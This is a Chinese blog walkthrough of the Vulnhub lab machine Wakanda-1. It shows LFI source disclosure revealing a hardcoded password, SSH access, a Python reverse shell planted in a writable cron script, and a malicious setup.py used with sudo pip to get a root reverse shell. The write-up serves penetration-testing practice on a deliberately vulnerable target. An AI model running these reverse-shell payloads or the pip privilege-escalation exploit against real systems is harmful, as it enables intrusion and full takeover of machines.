vulnerable靶机wakanda渗透测试笔记

最新推荐文章于 2024-04-15 00:46:24 发布
最新推荐文章于 2024-04-15 00:46:24 发布
阅读量753 收藏 2
点赞数 1
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kwist_jay/article/details/107677817
版权

首先我们从网站上下载靶机wakanda-1的ova文件安装(最好是在virtual box上,vm上安装较为麻烦),我的kali在vm上,于是把靶机和kali放在同一个网段就行了,我做的是把kali和wakanda桥接到同一个物理网卡上。

     在kali上面探测一下内网存活的主机,这里有人喜欢用nmap,写个脚本自动ping,不过也可以用kali的工具netdiscover。

root@kali:~# netdiscover -i eth0

发现他的主机ip  192.168.0.137

探测一下端口开放情况:

root@kali:~# nmap -sS -p- 192.168.0.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 23:16 CST
Nmap scan report for Wakanda1 (192.168.0.137)
Host is up (0.00060s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
3333/tcp  open  dec-notes
35322/tcp open  unknown
MAC Address: 08:00:27:3C:1E:DB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
root@kali:~#

3333端口其实是ssh端口,看到80端口开放,于是去访问一下网站

查看网站的源代码,有一行注释给出提示:

于是考虑到LFI漏洞利用,利用PHP协议构造payload得到index.php的源代码。

丢到burp的decode解码得到源代码:

<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>

这里看到了一个密码,于是尝试ssh登陆服务器。之前看到有一个made by mamadou,作为用户名来登录。

root@kali:~# ssh mamadou@192.168.0.137 -p 3333
mamadou@192.168.0.137's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 29 10:29:35 2020 from kali
Python 2.7.9 (default, Jun 29 2016, 13:08:31) 
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system("/bin/bash")
mamadou@Wakanda1:~$ id
uid=1000(mamadou) gid=1000(mamadou) groups=1000(mamadou)
mamadou@Wakanda1:~$

得到的是一个python命令行,转成终端命令行,在mamadou的用户目录下看到flag1.txt

看一下/etc/passwd的内容,发现其他用户devops。

于是看看这个用户下面有什么文件能够被利用:

发现了两个可疑的文件,就是前两个.antivirus.py和/tmp/test,而且文件创建时间都很靠前,最主要是.antivirus.py给其他组用户提供了修改权限。看一看这个文件的内容

mamadou@Wakanda1:/srv$ cat .antivirus.py 
open('/tmp/test','w').write('test')

结合时间很新,说明这个py在定时执行,那就自然而然想到改这个py获取devops权限。

还有一种发现方式是在发现/tmp/test这个文件后,执行命令

mamadou@Wakanda1:/$ grep -r '/tmp/test' / 2>/dev/null
Binary file proc/1284/task/1284/cmdline matches
Binary file proc/1284/cmdline matches
srv/.antivirus.py:open('/tmp/test','w').write('test')
usr/lib/python2.7/dist-packages/setuptools/tests/test_packageindex.py:        url = 'file:///tmp/test_package_index'
Binary file usr/lib/python2.7/dist-packages/setuptools/tests/test_packageindex.pyc matches

这样也可以发现.antivirus.py。

在antivirus.py里面做一个反弹shell,kali侦听本地端口1234.

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.186",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

root@kali:~# nc -nvvlp 1234
listening on [any] 1234 ...
connect to [192.168.0.137] from localhost [192.168.0.106] 60823
bash: cannot set terminal process group (1107): Inappropriate ioctl for device
bash: no job control in this shell
devops@Wakanda1:/$ id
uid=1001(devops) gid=1002(developer) groups=1002(developer)

于是可以直接得到devops的shell,在devops的用户目录下得到flag2.txt。

sudo -l 发现有pip权限,于是做一个恶意安装文件,来获取root权限。

$ sudo -l
Matching Defaults entries for devops on Wakanda1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User devops may run the following commands on Wakanda1:
    (ALL) NOPASSWD: /usr/bin/pip

这里借用别人写好的exp:

from setuptools import setup
from setuptools.command.install import install
import os,socket,subprocess


class CustomInstall(install):

    def run(self):
        install.run(self)
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(("192.168.0.186",14580))
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        p=subprocess.call(["/bin/sh","-i"])


setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/werneror',
      author='Werner',
      author_email='me@werner.wiki',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

改一下IP和端口,反弹shell到kali。这里我实在kali上面写好,搭建简易的http服务器。

在靶机上下载文件后运行pip即可获得root权限

$ sudo pip install . --upgrade --force-reinstall
Unpacking /tmp/pip2
  Running setup.py (path:/tmp/pip-CarpRr-build/setup.py) egg_info for package from file:///tmp/pip2

Installing collected packages: FakePip
  Found existing installation: FakePip 0.0.1
    Uninstalling FakePip:
      Successfully uninstalled FakePip
  Running setup.py install for FakePip

kali侦听14580端口:获取root权限 ,完成!!

做这个靶机有参考两篇文章:

https://blog.werner.wiki/penetrate-wakanda-1/

https://www.freebuf.com/articles/network/185023.html

kwist_jay
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞平台批量安装
墨痕诉清风的博客
07-30 1290
今天给大家分享一个docker安装的漏洞平台批量安装vulstudy是专门收集当下流行的漏洞学习平台,并将其制作成搬运工镜像,方便大家快速搭建环境,节省搭建时间,专注于的漏洞学习上目前。
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为... DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
vulnerable-node:一个用NodeJS编写的非常易受攻击的网站,目的是拥有一个已确定漏洞的项目,以测试安全分析器工具的质量
04-29
脆弱节点 脆弱节点:用NodeJS编写的非常脆弱的网站 代码名称 聚苯乙烯 版本 1.0 代码 问题 作者 丹尼尔·加西亚(cr0hn)-@ggdaniel 支持这个项目 通过应用Github的“赞助商”按钮来支持该项目(解决问题,新功能...)。 这是什么项目 该项目的目标是成为一个在NodeJS中具有真正易受攻击的代码的项目,而不是模拟的项目。 为什么? 像OWASP Node Goat这样的类似项目对于学习过程非常漂亮且有用,但对于真正的研究人员或研究源代码中的漏洞却没有作用,因为它们的代码并不是真正易受攻击,而是经过仿真的。 该项目的创建目的是为了拥有一个源代码中已确定漏洞的项目,最终可以测量安全分析器工具的质量。 尽管这不是其主要目标,但该项目还可用于: 渗透测试培训。 教学:学习如何在NodeJS中不进行编程。 该项目的目的是提供一个真实的应用程序,以在白盒
Vulnhub Node:1 详解
StriveBen的博客
09-03 1271
文章首发:https://xz.aliyun.com/t/2695 欢迎进群交流技术: 363034250 信息收集 arp-scan 用来发现系统和指纹识别的命令行工具。 从结果中可以看到node的ip是”192.168.92.129” 使用nmap对端口进行探测,如下图所示: 可知开放的端口有2个,分别是:22和3000,其中3000是个web服务; 详细banner信息...
内网渗透-反弹shell的N种姿势
最新发布
lza20001103的博客
04-15 818
内网渗透-反弹shell的N种姿势
靶场攻略 | 网络安全靶场合集
Python_0011的博客
10-11 2731
1JAVA环境。
推荐一些开源实用的安全渗透测试工具!
伤心的辣条
03-23 615
近些年来,隐私泄露事件频发,导致当事人发生严重的恶性后果,个人隐私的保护被不知不觉中提高到前所未有的高度,在科技的发展给我们的生活和工作带来了便利,软件产品在满足我们基本的功能需求的同时越来越多的人开始关注软件安全问题。
DVWA渗透测试网站
09-03
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在...
网络渗透测试平台_DVWA_201807
07-04
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DSVW渗透测试平台
02-27
Damn Small Vulnerable Web (DSVW) 是使用 Python 语言开发的 Web应用漏洞 的演练系统。其系统只有一个 python 的脚本文件组成, 当中涵盖了 26 种 Web应用漏洞环境
The-Vulnerable-Web-Application:使用具有不同漏洞的 Node.js 和用于测试的示例网站制作
08-05
要求 需要创建Node.js, NPM, MySQL MySQL数据库..里面必须根据使用情况创建不同的表.. 项目中有两个部分。 第一部分包含不同类型的漏洞,以及如何防止它们,第二部分包含一个简单的购物网站,用户可以在上面练习查找 Web 应用程序漏洞。 技术 我在整个后端部分使用了 Node.js,在数据库中使用了 MySQL。 整个事情都是在 Linux 环境中设置的,尽管它也可以在 Windows 中设置。 对于市场站点,制作了简单的主页,其中包含登录、注册选项。 在市场站点的数据库中制作了单独的表格。 注册时,用户详细信息存储在表中。 登录页面使用相同的数据库来验证用户并允许访问仪表板,即站点功能的主页。 漏洞利用 XSS(Reflected) :要求在输入字段中输入名称,并显示有关名称的信息。 除了名称,如果用户还输入了一些脚本,如[removed]alert(10)</sc
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
Vulnhub靶机Wakanda渗透测试攻略
10-15 3773
前言 Wakanda是一个新的交易市场网站,很快会上线了。你的目标是通过黑客技术找到“振金”的确切位置。 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnhub,这台靶机上包含了很多很酷的技巧。 百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导...
VulnHub-Tomato靶机详细渗透过程
MRS_jianai的博客
12-21 860
VulnHub-Tomato靶机详细渗透过程
【Webpack基础】Webpack4 常用依赖及配置
小管打天下的博客
06-02 447
```javascript { "name": "cart", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "webpack": "webpack --config webpack.config.js", "dev": "webpack-dev-server
Mac 下使用 docker 安装 vulnstudy靶场 初始化postgresql
qq_43558415的博客
05-07 814
docker mac版下载: https://hub.docker.com/editions/community/docker-ce-desktop-mac vulnstudy 集成靶场下载: https://github.com/c0ny1/vulstudy vulnerable-node中postgresql 问题: Error: Database is uninitialized a...
漏洞及渗透练习平台
迷风小白
03-28 3809
漏洞及渗透练习平台: WebGoat漏洞练习环境 https://github.com/WebGoat/WebGoat https://github.com/WebGoat/WebGoat-Legacy Damn Vulnerable Web Application(漏洞练习平台) https://github.com/RandomStorm/DVWA 数据库注入练习平台 https://gi...
kali linux渗透测试靶机
02-23
Kali Linux是一种专门用于渗透测试和网络安全的操作系统。它集成了大量的渗透测试工具和资源,使得安全专业人员能够有效地评估和保护网络系统的安全性。 Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux渗透测试靶机: 1. Metasploitable:Metasploitable是一个故意构建的易受攻击的虚拟机,它包含了多个漏洞和弱点,可以用于学习和实践Metasploit框架的使用。 2. DVWA(Damn Vulnerable Web Application):DVWA是一个故意构建的Web应用程序,包含了多个常见的Web漏洞,如SQL注入、XSS等,可以用于学习和实践Web应用程序渗透测试技术。 3. OWASP Mutillidae II:Mutillidae II是一个故意构建的Web应用程序,旨在模拟真实世界中的各种Web漏洞和攻击场景,包括SQL注入、文件包含等。 4. Hack The Box:Hack The Box是一个在线平台,提供了一系列的渗透测试靶机,每个靶机都有不同的漏洞和挑战,可以用于测试和提高渗透测试技能。 这些渗透测试靶机都可以在Kali Linux上进行安装和使用。通过实践和探索这些靶机安全专业人员可以提高他们的渗透测试技能,并了解如何保护网络系统免受各种攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值